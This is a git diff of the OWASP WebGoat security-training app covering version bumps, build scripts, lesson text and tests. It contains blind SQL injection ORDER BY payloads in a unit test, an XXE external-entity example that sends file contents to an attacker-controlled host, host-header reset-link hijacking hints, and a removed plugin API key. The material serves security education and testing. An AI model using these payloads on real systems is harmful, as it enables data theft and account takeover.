-            <plugin>
-                <groupId>com.versioneye</groupId>
-                <artifactId>versioneye-maven-plugin</artifactId>
-                <version>${versioneye-maven-plugin.version}</version>
-                <configuration>
-                    <apiKey>a1e4a9da4ed34ee44cab</apiKey>
-                    <projectId>562da95be346d7000e0369ac</projectId>
-                </configuration>
-            </plugin>
         </plugins>
     </build>
 

scripts/build-all.sh

@@ -7,21 +7,23 @@ SUCCESS=$?
 nc -zv 127.0.0.1 9090 2>/dev/null
 SUCCESS=${SUCCESS}$?
 
-if [[ "${SUCCESS}" -eq 00 ]] ; then
+if [[ "${SUCCESS}" -eq 0 ]] ; then
   echo "WebGoat and or WebWolf are still running, please stop them first otherwise unit tests might fail!"
   exit 127
 fi
 
 
-#mvn clean install
+sh mvnw clean install
-#if [[ "$?" -ne 0 ]] ; then
+if [[ "$?" -ne 0 ]] ; then
-#  exit y$?
+  exit y$?
-#fi
+fi
 
 cd -
 sh build_docker.sh
+if [[ "$?" -ne 0 ]] ; then
+  exit y$?
+fi
 
-echo "Do you want to run docker-compose?"
 while true; do
     read -p "Do you want to run docker-compose?" yn
     case ${yn} in

scripts/build_docker.sh

@@ -2,9 +2,9 @@
 
 WEBGOAT_HOME=$(pwd)/../
 
-cd ${WEBGOAT_HOME}/webgoat-server
+cd "${WEBGOAT_HOME}"/webgoat-server
-docker build -t webgoat/webgoat-8.0 .
+docker build -t webgoat/webgoat-v8.0.0.snapshot .
 
-cd ${WEBGOAT_HOME}/webwolf
+cd "${WEBGOAT_HOME}"/webwolf
-docker build -t webgoat/webwolf .
+docker build -t webgoat/webwolf-v8.0.0.snapshot .
 

scripts/clean-run-docker-compose.sh

@@ -2,4 +2,4 @@
 
 cd ..
 docker-compose rm -f
-docker-compose up
+docker-compose -f docker-compose-local.yml up

scripts/start.sh

@@ -0,0 +1,18 @@
+#!/usr/bin/env bash
+
+DATABASE_PORT=9001
+
+checkDatabaseAvailable(){
+
+  #for i in $(seq 1 5); do command && s=0 && break || s=$? && sleep 15; done; (exit $s)
+  local started = $(netstat -lnt | grep ${DATABASE_PORT})
+  echo $?
+}
+
+#java -Djava.security.egd=file:/dev/./urandom -jar home/webgoat/webgoat.jar --server.address=0.0.0.0
+$(checkDatabaseAvailable)
+
+
+#java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0
+
+

webgoat-container/pom.xml

@@ -10,7 +10,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <profiles>
@@ -64,16 +64,6 @@
                     <useDefaultDelimiters>false</useDefaultDelimiters>
                 </configuration>
             </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>${maven-compiler-plugin.version}</version>
-                <configuration>
-                    <source>1.8</source>
-                    <target>1.8</target>
-                    <encoding>ISO-8859-1</encoding>
-                </configuration>
-            </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-surefire-plugin</artifactId>
@@ -191,7 +181,9 @@
             <artifactId>junit</artifactId>
             <version>${junit.version}</version>
             <type>jar</type>
+            <scope>test</scope>
         </dependency>
+
         <!-- ************* END: Dependencies for Unit and Integration Testing ************** -->
         <!-- ************* END: <dependencies> ************** -->
     </dependencies>

webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java

@@ -37,6 +37,7 @@ import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
 import org.owasp.webgoat.asciidoc.WebGoatVersionMacro;
 import org.owasp.webgoat.asciidoc.WebWolfMacro;
+import org.owasp.webgoat.asciidoc.WebWolfRootMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@@ -87,6 +88,7 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
                     StringWriter writer = new StringWriter();
                     JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
                     extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+                    extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
                     extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
 
                     asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java

@@ -45,6 +45,10 @@ public class WebWolfMacro extends InlineMacroProcessor {
         HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
         String ip = request.getRemoteAddr();
         String hostname = StringUtils.hasText(ip) ? ip : host;
-        return "http://" + hostname + ":" + port + "/WebWolf";
+        return "http://" + hostname + ":" + port + (includeWebWolfContext() ? "/WebWolf" : "");
+    }
+
+    protected boolean includeWebWolfContext() {
+        return true;
     }
 }

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java

@@ -0,0 +1,20 @@
+package org.owasp.webgoat.asciidoc;
+
+import java.util.Map;
+
+/**
+ * Usage in asciidoc:
+ * <p>
+ * webWolfLink:here[] will display a href with here as text
+ * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
+ */
+public class WebWolfRootMacro extends WebWolfMacro {
+
+    public WebWolfRootMacro(String macroName, Map<String, Object> config) {
+        super(macroName, config);
+    }
+
+    protected boolean includeWebWolfContext() {
+        return false;
+    }
+}

webgoat-images/vagrant-training/Vagrantfile

@@ -19,17 +19,17 @@ Vagrant.configure(2) do |config|
   end
 
   config.vm.provision "shell", inline: <<-SHELL
-    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webgoat-server-8.0.0.M21.jar
-    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webwolf-8.0.0.M21.jar
     sudo add-apt-repository ppa:openjdk-r/ppa
     sudo apt-get update
     sudo apt-get install openjdk-8-jre -y
     SHELL
 
   config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL
-    java -jar webgoat-server-8.0.0.RELEASE.jar &
+    java -jar webgoat-server-8.0.0.M21.jar --server.address=0.0.0.0 &
     sleep 40s
-    java -jar webwolf-8.0.0.RELEASE.jar
+    java -jar webwolf-8.0.0.M21.jar --server.address=0.0.0.0 &
     SHELL
 
 end

webgoat-lessons/auth-bypass/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 </project>

webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java

@@ -58,7 +58,7 @@ public class AccountVerificationHelper {
             return false;
         }
 
-        if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("seQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) {
+        if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("secQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) {
             return false;
         }
 

webgoat-lessons/bypass-restrictions/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 </project>

webgoat-lessons/challenge/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 

webgoat-lessons/client-side-filtering/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 </project>

webgoat-lessons/cross-site-scripting/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
     <build>
        <plugins>

webgoat-lessons/csrf/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 </project>

webgoat-lessons/html-tampering/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc

@@ -1,6 +1,6 @@
 === Mitigation
 
-In this simple example you noticed that the price is calculated server side and send to the server. The server
+In this simple example you noticed that the price is calculated client-side and sent to the server. The server
 accepted the input as a given and did not calculate the price again. One of the mitigations in this case is to look up
 the price of the television in your database and calculate the total price again.
 

webgoat-lessons/http-basics/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 </project>

webgoat-lessons/http-proxies/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/idor/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 </project>

webgoat-lessons/insecure-deserialization/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/insecure-login/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/jwt/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/missing-function-ac/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
 </project>

webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java

@@ -1,6 +1,5 @@
 package org.owasp.webgoat.plugin;
 
-import com.sun.org.apache.xpath.internal.axes.HasPositionalPredChecker;
 import org.owasp.webgoat.assignments.Endpoint;
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.UserSessionData;
@@ -13,9 +12,6 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import javax.servlet.http.HttpServletRequest;
 import java.sql.*;
 import java.util.HashMap;
-import java.util.Map;
-
-import static javax.swing.UIManager.getString;
 
 public class Users extends Endpoint{
 

webgoat-lessons/password-reset/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>

webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java

@@ -4,7 +4,6 @@ import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.plugin.PasswordResetEmail;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -14,8 +13,6 @@ import org.springframework.web.client.RestClientException;
 import org.springframework.web.client.RestTemplate;
 
 import java.time.LocalDateTime;
-import java.util.Map;
-import java.util.Optional;
 
 import static java.util.Optional.ofNullable;
 
@@ -37,23 +34,10 @@ public class SimpleMailAssignment extends AssignmentEndpoint {
 
     @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
     @ResponseBody
-    public AttackResult sendEmail(@RequestParam Map<String, Object> json) {
+    public AttackResult login(@RequestParam String email, @RequestParam String password) {
-        String email = (String) json.get("emailReset");
+        String emailAddress = ofNullable(email).orElse("unknown@webgoat.org");
-        if (StringUtils.isEmpty(email)) {
+        String username = extractUsername(emailAddress);
-            email = (String) json.getOrDefault("email", "unknown@webgoat.org");
-        }
-        String password = (String) json.getOrDefault("password", "");
-        int index = email.indexOf("@");
-        String username = email.substring(0, index == -1 ? email.length() : index);
 
-        if (StringUtils.isEmpty(password)) {
-            return sendEmail(username, email);
-        } else {
-            return checkPassword(password, username);
-        }
-    }
-
-    private AttackResult checkPassword(String password, String username) {
         if (username.equals(getWebSession().getUserName()) && StringUtils.reverse(username).equals(password)) {
             return trackProgress(success().build());
         } else {
@@ -61,6 +45,18 @@ public class SimpleMailAssignment extends AssignmentEndpoint {
         }
     }
 
+    @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE, value = "/reset")
+    @ResponseBody
+    public AttackResult resetPassword(@RequestParam String emailReset) {
+        String email = ofNullable(emailReset).orElse("unknown@webgoat.org");
+        return sendEmail(extractUsername(email), email);
+    }
+
+    private String extractUsername(String email) {
+        int index = email.indexOf("@");
+        return email.substring(0, index == -1 ? email.length() : index);
+    }
+
     private AttackResult sendEmail(String username, String email) {
         if (username.equals(getWebSession().getUserName())) {
             PasswordResetEmail mailEvent = PasswordResetEmail.builder()

webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html

@@ -14,16 +14,18 @@
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-        <form class="attack-form" accept-charset="UNKNOWN"
-              method="POST"
-              action="/WebGoat/PasswordReset/simple-mail"
-              enctype="application/json;charset=UTF-8">
-            <div class="container-fluid">
 
-                <div class="row">
+        <div class="container-fluid">
-                    <div class="col-md-4">
+
+            <div class="row">
+                <div class="col-md-4">
+                    <form class="attack-form" accept-charset="UNKNOWN" novalidate="novalidate"
+                          method="POST"
+                          action="/WebGoat/PasswordReset/simple-mail"
+                          enctype="application/json;charset=UTF-8">
                         <div style="padding: 20px;" id="password-login-2">
-                            <h4 style="border-bottom: 1px solid #c5c5c5;"><i class="glyphicon glyphicon-user"></i> Account
+                            <h4 style="border-bottom: 1px solid #c5c5c5;"><i class="glyphicon glyphicon-user"></i>
+                                Account
                                 Access</h4>
                             <fieldset>
                                 <div class="form-group input-group">
@@ -41,7 +43,8 @@
                                         Access
                                     </button>
                                     <p class="help-block">
-                                        <a class="pull-right text-muted" href="#" id="olvidado" onclick="showPasswordReset()">
+                                        <a class="pull-right text-muted" href="#" id="olvidado"
+                                           onclick="showPasswordReset()">
                                             <small>Forgot your password?</small>
                                         </a>
                                     </p>
@@ -49,6 +52,12 @@
                             </fieldset>
 
                         </div>
+                    </form>
+
+                    <form class="attack-form" accept-charset="UNKNOWN" novalidate="novalidate"
+                          method="POST"
+                          action="/WebGoat/PasswordReset/simple-mail/reset"
+                          enctype="application/json;charset=UTF-8">
                         <div style="display: none;" id="password-reset-2">
                             <h4 class="">Forgot your password?</h4>
 
@@ -69,10 +78,10 @@
                             </fieldset>
 
                         </div>
-                    </div>
+                    </form>
                 </div>
             </div>
-        </form>
+        </div>
         <br/>
 
         <br/>

webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties

@@ -15,7 +15,7 @@ password-reset-not-solved=Sorry but you did not redirect the reset link to WebWo
 password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf.
 password-reset-hint2=Look at the link, can you think how the server creates this link?
 password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link...
-password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090
+password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090?
 password-reset-hint5=Intercept the request and change the host header
 login_failed=Login failed
 login_failed.tom=Sorry only Tom can login at the moment

webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc

@@ -14,5 +14,5 @@ The time out is necessary to restrict the attack window, having a link opens up
 
 Tom always resets his password immediately after receiving the email with the link.
 Try to reset the password of Tom (tom@webgoat-cloud.org) to your own choice and login as Tom with
-that password.
+that password. Note: it is not possible to use OWASP ZAP for this lesson.
 

webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html

@@ -9,7 +9,7 @@
 <div class="container">
     <div class="row">
         <div class="col-xs-12 col-sm-8 col-md-6 col-sm-offset-2 col-md-offset-3">
-            <form role="form" method="POST" action="/WebGoat/PasswordReset/reset/change-password" th:object="${form}">
+            <form role="form" method="POST" action="/WebGoat/PasswordReset/reset/change-password" th:object="${form}" novalidate="novalidate">
                 <h2 class="sign_up_title">Reset your password</h2>
                     <div class="form-group" th:classappend="${#fields.hasErrors('password')}? 'has-error'">
                         <input type="hidden" name="resetLink" th:field="*{resetLink}" />

webgoat-lessons/pom.xml

@@ -5,12 +5,12 @@
     <groupId>org.owasp.webgoat.lesson</groupId>
     <artifactId>webgoat-lessons-parent</artifactId>
     <packaging>pom</packaging>
-    <version>v8.0.0.M20</version>
+    <version>v8.0.0.M22</version>
 
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <modules>

webgoat-lessons/sql-injection/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 </project>

webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties

@@ -20,14 +20,14 @@ SqlStringInjectionHint9=Intercept the request and try to specify a different ord
 SqlStringInjectionHint10=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens
 SqlStringInjectionHint11=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens
 
-sql-injection.5a.success=You have succeed: {0}
+sql-injection.5a.success=You have succeeded: {0}
 sql-injection.5a.no.results=No results matched. Try Again.
 
-sql-injection.5b.success=You have succeed: {0}
+sql-injection.5b.success=You have succeeded: {0}
 sql-injection.5b.no.results=No results matched. Try Again.
 
-sql-injection.6a.success=You have succeed: {0}
+sql-injection.6a.success=You have succeeded: {0}
 sql-injection.6a.no.results=No results matched. Try Again.
 
-sql-injection.6b.success=You have succeed: {0}
+sql-injection.6b.success=You have succeeded: {0}
 sql-injection.6b.no.results=No results matched. Try Again.

webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc

@@ -1,4 +1,5 @@
 In this assignment try to perform an SQL injection through the ORDER BY field.
-Try to find the ip address of the `webgoat-prd` server.
+Try to find the ip address of the `webgoat-prd` server, guessing the complete
+ip address might take too long so we give you the last part: `xxx.130.219.202`
 
 Note: The submit field of this assignment is *NOT* vulnerable for an SQL injection.

webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java

@@ -63,7 +63,7 @@ public class SqlInjectionLesson5aTest extends LessonTest {
 
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("You have succeed")))
+                .andExpect(jsonPath("$.feedback", containsString("You have succeeded")))
                 .andExpect(jsonPath("$.output").doesNotExist());
     }
 

webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java

@@ -28,7 +28,7 @@ public class SqlInjectionLesson12aTest extends LessonTest {
     private WebgoatContext context;
 
     @Before
-    public void setup() throws Exception {
+    public void setup()  {
         SqlInjection sql = new SqlInjection();
 
         when(webSession.getCurrentLesson()).thenReturn(sql);
@@ -44,6 +44,40 @@ public class SqlInjectionLesson12aTest extends LessonTest {
                 .andExpect(status().isOk());
     }
 
+    @Test
+    public void addressCorrectShouldOrderByHostname() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
+                .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END"))
+
+                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+    }
+
+    @Test
+    public void addressCorrectShouldOrderByHostnameUsingSubstr() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
+                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '1') IS NOT NULL then hostname else id end"))
+
+                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+
+        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
+                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,2,1) = '0') IS NOT NULL then hostname else id end"))
+
+                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+
+        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
+                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,3,1) = '4') IS NOT NULL then hostname else id end"))
+
+                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+    }
+
+    @Test
+    public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
+                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '9') IS NOT NULL then hostname else id end"))
+
+                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
+    }
+
     @Test
     public void trueShouldSortByHostname() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
@@ -63,21 +97,13 @@ public class SqlInjectionLesson12aTest extends LessonTest {
     }
 
     @Test
-    public void passwordIncorrectShouldOrderByHostname() throws Exception {
+    public void addressIncorrectShouldOrderByHostname() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
                 .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '192.%' THEN hostname ELSE id END"))
 
                 .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
     }
 
-    @Test
-    public void passwordCorrectShouldOrderByHostname() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
-                .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-    }
-
     @Test
     public void postingCorrectAnswerShouldPassTheLesson() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack12a")

webgoat-lessons/vulnerable-components/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
     <dependencies>
         <dependency>

webgoat-lessons/webgoat-introduction/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 </project>

webgoat-lessons/webwolf-introduction/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 </project>

webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc

@@ -23,8 +23,8 @@ website. The following items are supported in WebWolf:
 * Receiving email
 * Landing page for incoming requests
 
-WebWolf runs as a separate web application and is started automatically when using the Docker image. If you
+WebWolf runs as a separate web application. If you are using the Docker-compose file you can just point your browser webWolfLink:here[] to open WebWolf.
-are not using the Docker image you will need to download the jar file and start it:
+If you want to use the standalone version, you will need to download the jar file and start it:
 
 ```
 java -jar webwolf-<<version>>.jar [--server.port=9090] [--server.address=localhost]
@@ -33,17 +33,7 @@ java -jar webwolf-<<version>>.jar [--server.port=9090] [--server.address=localho
 By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you
 can bind it to a different address (default localhost)
 
-WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need
+Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well.
-to find out the ip address of the Docker container.
-
-```
-WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`)
-docker pull webgoat/webwolf
-docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 9090:9090 webgoat/webwolf /home/webwolf/run.sh
-```
-
-Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If
-you start WebGoat as Docker container you need to start WebWolf as Docker container as well.
 
 
 This will start the application on port 9090, click webWolfLink:here[] to open WebWolf.

webgoat-lessons/xxe/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>
@@ -15,6 +15,11 @@
             <artifactId>commons-lang</artifactId>
             <version>2.6</version>
         </dependency>
+        <dependency>
+            <groupId>org.glassfish.jaxb</groupId>
+            <artifactId>jaxb-runtime</artifactId>
+            <version>2.3.0</version>
+        </dependency>
 
         <dependency>
             <groupId>com.github.tomakehurst</groupId>

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc

@@ -5,7 +5,7 @@ Or the resource you are trying to read contains illegal XML character which caus
 Let's start with an example, in this case we reference an external DTD which we control on our own server.
 
 As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
-use this server to ping it using `webWolfLink:landing[noLink]`
+use this server to ping it using `webWolfRootLink:landing[noLink]`
 
 How do we use this endpoint to verify whether we can perform XXE?
 
@@ -14,7 +14,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi
 [source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
+<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink]'>
 ----
 
 Now submit the form change the xml using to:
@@ -37,7 +37,7 @@ Now in WebWolf browse to 'Incoming requests' and you will see:
 ----
 {
   "method" : "GET",
-  "path" : "/ping",
+  "path" : "/landing",
   "headers" : {
     "request" : {
       "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc

@@ -18,6 +18,6 @@ DTD.
 |`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
 |===
 
-Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
+Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
 (NOTE: this endpoint is under your full control)
 Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc

@@ -2,6 +2,7 @@
 
 An XML Entity allows tags to be defined that will be replaced by content when the XML Document is parsed.
 In general there are three types of entities:
+
 * internal entities
 * external entities
 * parameter entities.
@@ -34,6 +35,7 @@ may be exploited by dereferencing a malicious URI, possibly allowing arbitrary c
 local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.
 
 In general we can distinguish the following kind of XXE attacks:
+
 * Classic: in this case an external entity is included in a local DTD
 * Blind: no output and or errors are shown in the response
 * Error: try to get the content of a resource in the error message

